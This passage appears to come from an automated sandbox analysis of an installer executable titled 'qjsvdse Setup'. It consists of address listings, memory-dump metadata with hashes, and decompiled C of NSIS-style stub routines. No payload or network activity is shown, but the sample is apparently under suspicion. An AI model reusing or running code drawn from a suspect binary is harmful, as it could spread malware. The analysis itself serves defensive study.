                                                                                              0x004061dc
                                                                                              0x004061ea
                                                                                              0x004061ed
                                                                                              0x004061de
                                                                                              0x004061de
                                                                                              0x004061e0
                                                                                              0x004061e7
                                                                                              0x004061e7
                                                                                              0x00406216
                                                                                              0x00406216
                                                                                              0x00406216
                                                                                              0x00406219
                                                                                              0x0040621b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004061f6
                                                                                              0x004061f6
                                                                                              0x004061fa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406200
                                                                                              0x00406200
                                                                                              0x00406203
                                                                                              0x00406206
                                                                                              0x00406209
                                                                                              0x0040620b
                                                                                              0x0040620d
                                                                                              0x00406210
                                                                                              0x00406213
                                                                                              0x00406213
                                                                                              0x00406213
                                                                                              0x0040621d
                                                                                              0x0040621d
                                                                                              0x0040621f
                                                                                              0x00406221
                                                                                              0x0040622c
                                                                                              0x0040622f
                                                                                              0x00406232
                                                                                              0x00406234
                                                                                              0x00406236
                                                                                              0x00406238
                                                                                              0x0040623b
                                                                                              0x0040623e
                                                                                              0x00406243
                                                                                              0x00406246
                                                                                              0x00406249
                                                                                              0x0040624c
                                                                                              0x00406253
                                                                                              0x00406256
                                                                                              0x00406258
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040625e
                                                                                              0x0040625e
                                                                                              0x00406262
                                                                                              0x00406273
                                                                                              0x00406273
                                                                                              0x00406273
                                                                                              0x00406275
                                                                                              0x00406275
                                                                                              0x00406279
                                                                                              0x00406279
                                                                                              0x00406279
                                                                                              0x0040627b
                                                                                              0x0040627c
                                                                                              0x0040627f
                                                                                              0x0040627f
                                                                                              0x0040627f
                                                                                              0x00406282
                                                                                              0x00000000
                                                                                              0x00406282
                                                                                              0x00406264
                                                                                              0x00406264
                                                                                              0x00406267
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040626d
                                                                                              0x0040626d
                                                                                              0x00000000
                                                                                              0x0040626d
                                                                                              0x004061c3
                                                                                              0x004061c3
                                                                                              0x004061c5
                                                                                              0x004061c7
                                                                                              0x004061ca
                                                                                              0x004061cd
                                                                                              0x004061d1
                                                                                              0x004061d1
                                                                                              0x004062a5
                                                                                              0x004062a5
                                                                                              0x004062a8
                                                                                              0x004062af
                                                                                              0x004062b3
                                                                                              0x004062b5
                                                                                              0x004062b8
                                                                                              0x004062bb
                                                                                              0x004062c0
                                                                                              0x004062c3
                                                                                              0x004062c5
                                                                                              0x004062c6
                                                                                              0x004062c9
                                                                                              0x004062d4
                                                                                              0x004062d7
                                                                                              0x004062ee
                                                                                              0x004062f3
                                                                                              0x004062fa
                                                                                              0x004062ff
                                                                                              0x00406303
                                                                                              0x00406305
                                                                                              0x00406305
                                                                                              0x00406305
                                                                                              0x00406308
                                                                                              0x0040630a
                                                                                              0x00000000
                                                                                              0x00406310
                                                                                              0x00406310
                                                                                              0x00406314
                                                                                              0x0040631f
                                                                                              0x00406332
                                                                                              0x00406337
                                                                                              0x0040633c
                                                                                              0x0040633e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406344
                                                                                              0x00406344
                                                                                              0x00406347
                                                                                              0x00406349
                                                                                              0x00406357
                                                                                              0x00406357
                                                                                              0x0040635a
                                                                                              0x0040635a
                                                                                              0x0040635d
                                                                                              0x00406360
                                                                                              0x00406363
                                                                                              0x00406366
                                                                                              0x00406369
                                                                                              0x0040636c
                                                                                              0x00000000
                                                                                              0x0040636c
                                                                                              0x0040634b
                                                                                              0x0040634b
                                                                                              0x00406351
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406351
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004066f0
                                                                                              0x004066f0
                                                                                              0x004066f6
                                                                                              0x004066fc
                                                                                              0x00406701
                                                                                              0x00406707
                                                                                              0x0040670d
                                                                                              0x0040670f
                                                                                              0x00406712
                                                                                              0x0040671b
                                                                                              0x00406721
                                                                                              0x00406721
                                                                                              0x00406714
                                                                                              0x00406716
                                                                                              0x00406718
                                                                                              0x00406718
                                                                                              0x00406723
                                                                                              0x00406725
                                                                                              0x00406728
                                                                                              0x00406763
                                                                                              0x00406763
                                                                                              0x00000000
                                                                                              0x0040672a
                                                                                              0x0040672a
                                                                                              0x0040672a

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                                                                              • Instruction ID: e2ef9aa76577a7a1e17a70bef0141433c3d77918b2314780ae2ebb94a64f5d95
                                                                                              • Opcode Fuzzy Hash: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                                                                              • Instruction Fuzzy Hash: D1E17B71900709DFDB28CF58C884BAAB7F5EB44305F15852FE896AB291D378AA51CF14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040681A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                              				signed int _v8;
                                                                                              				unsigned int _v12;
                                                                                              				signed int _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				signed int _v24;
                                                                                              				signed int _v28;
                                                                                              				intOrPtr* _v32;
                                                                                              				signed int* _v36;
                                                                                              				signed int _v40;
                                                                                              				signed int _v44;
                                                                                              				intOrPtr _v48;
                                                                                              				intOrPtr _v52;
                                                                                              				void _v116;
                                                                                              				signed int _v176;
                                                                                              				signed int _v180;
                                                                                              				signed int _v240;
                                                                                              				signed int _t166;
                                                                                              				signed int _t168;
                                                                                              				intOrPtr _t175;
                                                                                              				signed int _t181;
                                                                                              				void* _t182;
                                                                                              				intOrPtr _t183;
                                                                                              				signed int* _t184;
                                                                                              				signed int _t186;
                                                                                              				signed int _t187;
                                                                                              				signed int* _t189;
                                                                                              				signed int _t190;
                                                                                              				intOrPtr* _t191;
                                                                                              				intOrPtr _t192;
                                                                                              				signed int _t193;
                                                                                              				signed int _t195;
                                                                                              				signed int _t200;
                                                                                              				signed int _t205;
                                                                                              				void* _t207;
                                                                                              				short _t208;
                                                                                              				signed char _t222;
                                                                                              				signed int _t224;
                                                                                              				signed int _t225;
                                                                                              				signed int* _t232;
                                                                                              				signed int _t233;
                                                                                              				signed int _t234;
                                                                                              				void* _t235;
                                                                                              				signed int _t236;
                                                                                              				signed int _t244;
                                                                                              				signed int _t246;
                                                                                              				signed int _t251;
                                                                                              				signed int _t254;
                                                                                              				signed int _t256;
                                                                                              				signed int _t259;
                                                                                              				signed int _t262;
                                                                                              				void* _t263;
                                                                                              				void* _t264;
                                                                                              				signed int _t267;
                                                                                              				intOrPtr _t269;
                                                                                              				intOrPtr _t271;
                                                                                              				signed int _t274;
                                                                                              				intOrPtr* _t275;
                                                                                              				unsigned int _t276;
                                                                                              				void* _t277;
                                                                                              				signed int _t278;
                                                                                              				intOrPtr* _t279;
                                                                                              				signed int _t281;
                                                                                              				intOrPtr _t282;
                                                                                              				intOrPtr _t283;
                                                                                              				signed int* _t284;
                                                                                              				signed int _t286;
                                                                                              				signed int _t287;
                                                                                              				signed int _t288;
                                                                                              				signed int _t296;
                                                                                              				signed int* _t297;
                                                                                              				intOrPtr _t298;
                                                                                              				void* _t299;
                                                                                              
                                                                                              				_t278 = _a8;
                                                                                              				_t187 = 0x10;
                                                                                              				memset( &_v116, 0, _t187 << 2);
                                                                                              				_t189 = _a4;
                                                                                              				_t233 = _t278;
                                                                                              				do {
                                                                                              					_t166 =  *_t189;
                                                                                              					_t189 =  &(_t189[1]);
                                                                                              					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                              					_t233 = _t233 - 1;
                                                                                              				} while (_t233 != 0);
                                                                                              				if(_v116 != _t278) {
                                                                                              					_t279 = _a28;
                                                                                              					_t267 =  *_t279;
                                                                                              					_t190 = 1;
                                                                                              					_a28 = _t267;
                                                                                              					_t234 = 0xf;
                                                                                              					while(1) {
                                                                                              						_t168 = 0;
                                                                                              						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                              							break;
                                                                                              						}
                                                                                              						_t190 = _t190 + 1;
                                                                                              						if(_t190 <= _t234) {
                                                                                              							continue;
                                                                                              						}
                                                                                              						break;
                                                                                              					}
                                                                                              					_v8 = _t190;
                                                                                              					if(_t267 < _t190) {
                                                                                              						_a28 = _t190;
                                                                                              					}
                                                                                              					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                              						_t234 = _t234 - 1;
                                                                                              						if(_t234 != 0) {
                                                                                              							continue;
                                                                                              						}
                                                                                              						break;
                                                                                              					}
                                                                                              					_v28 = _t234;
                                                                                              					if(_a28 > _t234) {
                                                                                              						_a28 = _t234;
                                                                                              					}
                                                                                              					 *_t279 = _a28;
                                                                                              					_t181 = 1 << _t190;
                                                                                              					while(_t190 < _t234) {
                                                                                              						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                              						if(_t182 < 0) {
                                                                                              							L64:
                                                                                              							return _t168 | 0xffffffff;
                                                                                              						}
                                                                                              						_t190 = _t190 + 1;
                                                                                              						_t181 = _t182 + _t182;
                                                                                              					}
                                                                                              					_t281 = _t234 << 2;
                                                                                              					_t191 = _t299 + _t281 - 0x70;
                                                                                              					_t269 =  *_t191;
                                                                                              					_t183 = _t181 - _t269;
                                                                                              					_v52 = _t183;
                                                                                              					if(_t183 < 0) {
                                                                                              						goto L64;
                                                                                              					}
                                                                                              					_v176 = _t168;
                                                                                              					 *_t191 = _t269 + _t183;
                                                                                              					_t192 = 0;
                                                                                              					_t235 = _t234 - 1;
                                                                                              					if(_t235 == 0) {
                                                                                              						L21:
                                                                                              						_t184 = _a4;
                                                                                              						_t271 = 0;
                                                                                              						do {
                                                                                              							_t193 =  *_t184;
                                                                                              							_t184 =  &(_t184[1]);
                                                                                              							if(_t193 != _t168) {
                                                                                              								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                              								_t236 =  *_t232;
                                                                                              								 *((intOrPtr*)(0x42cdf0 + _t236 * 4)) = _t271;
                                                                                              								 *_t232 = _t236 + 1;
                                                                                              							}
                                                                                              							_t271 = _t271 + 1;
                                                                                              						} while (_t271 < _a8);
                                                                                              						_v16 = _v16 | 0xffffffff;
                                                                                              						_v40 = _v40 & 0x00000000;
                                                                                              						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                              						_t195 = _v8;
                                                                                              						_t186 =  ~_a28;
                                                                                              						_v12 = _t168;
                                                                                              						_v180 = _t168;
                                                                                              						_v36 = 0x42cdf0;
                                                                                              						_v240 = _t168;
                                                                                              						if(_t195 > _v28) {
                                                                                              							L62:
                                                                                              							_t168 = 0;
                                                                                              							if(_v52 == 0 || _v28 == 1) {
                                                                                              								return _t168;
                                                                                              							} else {
                                                                                              								goto L64;
                                                                                              							}
                                                                                              						}
                                                                                              						_v44 = _t195 - 1;
                                                                                              						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                                              						do {
                                                                                              							_t282 =  *_v32;
                                                                                              							if(_t282 == 0) {
                                                                                              								goto L61;
                                                                                              							}
                                                                                              							while(1) {
                                                                                              								_t283 = _t282 - 1;
                                                                                              								_t200 = _a28 + _t186;
                                                                                              								_v48 = _t283;
                                                                                              								_v24 = _t200;
                                                                                              								if(_v8 <= _t200) {
                                                                                              									goto L45;
                                                                                              								}
                                                                                              								L31:
                                                                                              								_v20 = _t283 + 1;
                                                                                              								do {
                                                                                              									_v16 = _v16 + 1;
                                                                                              									_t296 = _v28 - _v24;
                                                                                              									if(_t296 > _a28) {
                                                                                              										_t296 = _a28;
                                                                                              									}
                                                                                              									_t222 = _v8 - _v24;
                                                                                              									_t254 = 1 << _t222;
                                                                                              									if(1 <= _v20) {
                                                                                              										L40:
                                                                                              										_t256 =  *_a36;
                                                                                              										_t168 = 1 << _t222;
                                                                                              										_v40 = 1;
                                                                                              										_t274 = _t256 + 1;
                                                                                              										if(_t274 > 0x5a0) {
                                                                                              											goto L64;
                                                                                              										}
                                                                                              									} else {
                                                                                              										_t275 = _v32;
                                                                                              										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                              										if(_t222 >= _t296) {
                                                                                              											goto L40;
                                                                                              										}
                                                                                              										while(1) {
                                                                                              											_t222 = _t222 + 1;
                                                                                              											if(_t222 >= _t296) {
                                                                                              												goto L40;
                                                                                              											}
                                                                                              											_t275 = _t275 + 4;
                                                                                              											_t264 = _t263 + _t263;
                                                                                              											_t175 =  *_t275;
                                                                                              											if(_t264 <= _t175) {
                                                                                              												goto L40;
                                                                                              											}
                                                                                              											_t263 = _t264 - _t175;
                                                                                              										}
                                                                                              										goto L40;
                                                                                              									}
                                                                                              									_t168 = _a32 + _t256 * 4;
                                                                                              									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                              									 *_a36 = _t274;
                                                                                              									_t259 = _v16;
                                                                                              									 *_t297 = _t168;
                                                                                              									if(_t259 == 0) {
                                                                                              										 *_a24 = _t168;
                                                                                              									} else {
                                                                                              										_t276 = _v12;
                                                                                              										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                              										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                              										_a5 = _a28;
                                                                                              										_a4 = _t222;
                                                                                              										_t262 = _t276 >> _t186;
                                                                                              										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                              										 *(_t298 + _t262 * 4) = _a4;
                                                                                              									}
                                                                                              									_t224 = _v24;
                                                                                              									_t186 = _t224;
                                                                                              									_t225 = _t224 + _a28;
                                                                                              									_v24 = _t225;
                                                                                              								} while (_v8 > _t225);
                                                                                              								L45:
                                                                                              								_t284 = _v36;
                                                                                              								_a5 = _v8 - _t186;
                                                                                              								if(_t284 < 0x42cdf0 + _a8 * 4) {
                                                                                              									_t205 =  *_t284;
                                                                                              									if(_t205 >= _a12) {
                                                                                              										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                              										_v36 =  &(_v36[1]);
                                                                                              										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                              										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                              									} else {
                                                                                              										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                              										_t208 =  *_t284;
                                                                                              										_v36 =  &(_t284[1]);
                                                                                              									}
                                                                                              									_a6 = _t208;
                                                                                              								} else {
                                                                                              									_a4 = 0xc0;
                                                                                              								}
                                                                                              								_t286 = 1 << _v8 - _t186;
                                                                                              								_t244 = _v12 >> _t186;
                                                                                              								while(_t244 < _v40) {
                                                                                              									 *(_t168 + _t244 * 4) = _a4;
                                                                                              									_t244 = _t244 + _t286;
                                                                                              								}
                                                                                              								_t287 = _v12;
                                                                                              								_t246 = 1 << _v44;
                                                                                              								while((_t287 & _t246) != 0) {
                                                                                              									_t287 = _t287 ^ _t246;
                                                                                              									_t246 = _t246 >> 1;
                                                                                              								}
                                                                                              								_t288 = _t287 ^ _t246;
                                                                                              								_v20 = 1;
                                                                                              								_v12 = _t288;
                                                                                              								_t251 = _v16;
                                                                                              								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                              									L60:
                                                                                              									if(_v48 != 0) {
                                                                                              										_t282 = _v48;
                                                                                              										_t283 = _t282 - 1;
                                                                                              										_t200 = _a28 + _t186;
                                                                                              										_v48 = _t283;
                                                                                              										_v24 = _t200;
                                                                                              										if(_v8 <= _t200) {
                                                                                              											goto L45;
                                                                                              										}
                                                                                              										goto L31;
                                                                                              									}
                                                                                              									break;
                                                                                              								} else {
                                                                                              									goto L58;
                                                                                              								}
                                                                                              								do {
                                                                                              									L58:
                                                                                              									_t186 = _t186 - _a28;
                                                                                              									_t251 = _t251 - 1;
                                                                                              								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                              								_v16 = _t251;
                                                                                              								goto L60;
                                                                                              							}
                                                                                              							L61:
                                                                                              							_v8 = _v8 + 1;
                                                                                              							_v32 = _v32 + 4;
                                                                                              							_v44 = _v44 + 1;
                                                                                              						} while (_v8 <= _v28);
                                                                                              						goto L62;
                                                                                              					}
                                                                                              					_t277 = 0;
                                                                                              					do {
                                                                                              						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                              						_t277 = _t277 + 4;
                                                                                              						_t235 = _t235 - 1;
                                                                                              						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                              					} while (_t235 != 0);
                                                                                              					goto L21;
                                                                                              				}
                                                                                              				 *_a24 =  *_a24 & 0x00000000;
                                                                                              				 *_a28 =  *_a28 & 0x00000000;
                                                                                              				return 0;
                                                                                              			}
                                                                                              0x00406976
                                                                                              0x00406979
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406979
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406b04
                                                                                              0x00406b04
                                                                                              0x00406b04
                                                                                              0x00406b09
                                                                                              0x00406b12
                                                                                              0x00406b1b
                                                                                              0x00000000
                                                                                              0x00406b1b
                                                                                              0x00406b28
                                                                                              0x00406b28
                                                                                              0x00406b2b
                                                                                              0x00406b32
                                                                                              0x00406b35
                                                                                              0x00000000
                                                                                              0x00406958
                                                                                              0x004068d8
                                                                                              0x004068da
                                                                                              0x004068da
                                                                                              0x004068de
                                                                                              0x004068e1
                                                                                              0x004068e2
                                                                                              0x004068e2
                                                                                              0x00000000
                                                                                              0x004068da
                                                                                              0x0040684e
                                                                                              0x00406854
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E00403E25(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                              				char* _v8;
                                                                                              				signed int _v12;
                                                                                              				void* _v16;
                                                                                              				struct HWND__* _t52;
                                                                                              				intOrPtr _t71;
                                                                                              				intOrPtr _t85;
                                                                                              				long _t86;
                                                                                              				int _t98;
                                                                                              				struct HWND__* _t99;
                                                                                              				signed int _t100;
                                                                                              				intOrPtr _t107;
                                                                                              				intOrPtr _t109;
                                                                                              				int _t110;
                                                                                              				signed int* _t112;
                                                                                              				signed int _t113;
                                                                                              				char* _t114;
                                                                                              				CHAR* _t115;
                                                                                              
                                                                                              				if(_a8 != 0x110) {
                                                                                              					if(_a8 != 0x111) {
                                                                                              						L11:
                                                                                              						if(_a8 != 0x4e) {
                                                                                              							if(_a8 == 0x40b) {
                                                                                              								 *0x429fb8 =  *0x429fb8 + 1;
                                                                                              							}
                                                                                              							L25:
                                                                                              							_t110 = _a16;
                                                                                              							L26:
                                                                                              							return E00403D44(_a8, _a12, _t110);
                                                                                              						}
                                                                                              						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                              						_t110 = _a16;
                                                                                              						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                              							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                              							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                              							_v12 = _t100;
                                                                                              							_v16 = _t109;
                                                                                              							_v8 = 0x42db00;
                                                                                              							if(_t100 - _t109 < 0x800) {
                                                                                              								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                              								SetCursor(LoadCursorA(0, 0x7f02));
                                                                                              								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                                                                              								SetCursor(LoadCursorA(0, 0x7f00));
                                                                                              								_t110 = _a16;
                                                                                              							}
                                                                                              						}
                                                                                              						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                              							goto L26;
                                                                                              						} else {
                                                                                              							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                              								SendMessageA( *0x42eb68, 0x111, 1, 0);
                                                                                              							}
                                                                                              							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                              								SendMessageA( *0x42eb68, 0x10, 0, 0);
                                                                                              							}
                                                                                              							return 1;
                                                                                              						}
                                                                                              					}
                                                                                              					if(_a12 >> 0x10 != 0 ||  *0x429fb8 != 0) {
                                                                                              						goto L25;
                                                                                              					} else {
                                                                                              						_t112 =  *0x4297a8 + 0x14;
                                                                                              						if(( *_t112 & 0x00000020) == 0) {
                                                                                              							goto L25;
                                                                                              						}
                                                                                              						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                              						E00403CFF(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                              						E004040B0();
                                                                                              						goto L11;
                                                                                              					}
                                                                                              				}
                                                                                              				_t98 = _a16;
                                                                                              				_t113 =  *(_t98 + 0x30);
                                                                                              				if(_t113 < 0) {
                                                                                              					_t107 =  *0x42e33c; // 0x65aa00
                                                                                              					_t113 =  *(_t107 - 4 + _t113 * 4);
                                                                                              				}
                                                                                              				_t71 =  *0x42eb98; // 0x6590c0
                                                                                              				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                              				_t114 = _t113 + _t71;
                                                                                              				_push(0x22);
                                                                                              				_a16 =  *_t114;
                                                                                              				_v12 = _v12 & 0x00000000;
                                                                                              				_t115 = _t114 + 1;
                                                                                              				_v16 = _t115;
                                                                                              				_v8 = E00403DF1;
                                                                                              				E00403CDD(_a4);
                                                                                              				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                              				_push(0x23);
                                                                                              				E00403CDD(_a4);
                                                                                              				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                              				E00403CFF( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                              				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                              				E00403D12(_t99);
                                                                                              				SendMessageA(_t99, 0x45b, 1, 0);
                                                                                              				_t85 =  *0x42eb70; // 0x654160
                                                                                              				_t86 =  *(_t85 + 0x68);
                                                                                              				if(_t86 < 0) {
                                                                                              					_t86 = GetSysColor( ~_t86);
                                                                                              				}
                                                                                              				SendMessageA(_t99, 0x443, 0, _t86);
                                                                                              				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                              				 *0x428f9c =  *0x428f9c & 0x00000000;
                                                                                              				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                              				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                                              				 *0x429fb8 =  *0x429fb8 & 0x00000000;
                                                                                              				return 0;
                                                                                              			}





















                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                              • String ID: N$`Ae$ivvzb$open
                                                                                              • API String ID: 3615053054-4071213321
                                                                                              • Opcode ID: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                                                                              • Instruction ID: ff75cf5183ce2723ba3e9af3fd3b1123c83c1709a93184edc862a5803e63a157
                                                                                              • Opcode Fuzzy Hash: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                                                                              • Instruction Fuzzy Hash: 3861CEB1A40209BFEB109F60CD45F6A7B69EB44715F10843AFB05BA2D1C7B8AD51CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                              				struct tagLOGBRUSH _v16;
                                                                                              				struct tagRECT _v32;
                                                                                              				struct tagPAINTSTRUCT _v96;
                                                                                              				struct HDC__* _t70;
                                                                                              				struct HBRUSH__* _t87;
                                                                                              				struct HFONT__* _t94;
                                                                                              				long _t102;
                                                                                              				intOrPtr _t115;
                                                                                              				signed int _t126;
                                                                                              				struct HDC__* _t128;
                                                                                              				intOrPtr _t130;
                                                                                              
                                                                                              				if(_a8 == 0xf) {
                                                                                              					_t130 =  *0x42eb70; // 0x654160
                                                                                              					_t70 = BeginPaint(_a4,  &_v96);
                                                                                              					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                              					_a8 = _t70;
                                                                                              					GetClientRect(_a4,  &_v32);
                                                                                              					_t126 = _v32.bottom;
                                                                                              					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                              					while(_v32.top < _t126) {
                                                                                              						_a12 = _t126 - _v32.top;
                                                                                              						asm("cdq");
                                                                                              						asm("cdq");
                                                                                              						asm("cdq");
                                                                                              						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                              						_t87 = CreateBrushIndirect( &_v16);
                                                                                              						_v32.bottom = _v32.bottom + 4;
                                                                                              						_a16 = _t87;
                                                                                              						FillRect(_a8,  &_v32, _t87);
                                                                                              						DeleteObject(_a16);
                                                                                              						_v32.top = _v32.top + 4;
                                                                                              					}
                                                                                              					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                              						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                              						_a16 = _t94;
                                                                                              						if(_t94 != 0) {
                                                                                              							_t128 = _a8;
                                                                                              							_v32.left = 0x10;
                                                                                              							_v32.top = 8;
                                                                                              							SetBkMode(_t128, 1);
                                                                                              							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                              							_a8 = SelectObject(_t128, _a16);
                                                                                              							DrawTextA(_t128, "qjsvdse Setup", 0xffffffff,  &_v32, 0x820);
                                                                                              							SelectObject(_t128, _a8);
                                                                                              							DeleteObject(_a16);
                                                                                              						}
                                                                                              					}
                                                                                              					EndPaint(_a4,  &_v96);
                                                                                              					return 0;
                                                                                              				}
                                                                                              				_t102 = _a16;
                                                                                              				if(_a8 == 0x46) {
                                                                                              					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                              					_t115 =  *0x42eb68; // 0x80110
                                                                                              					 *((intOrPtr*)(_t102 + 4)) = _t115;
                                                                                              				}
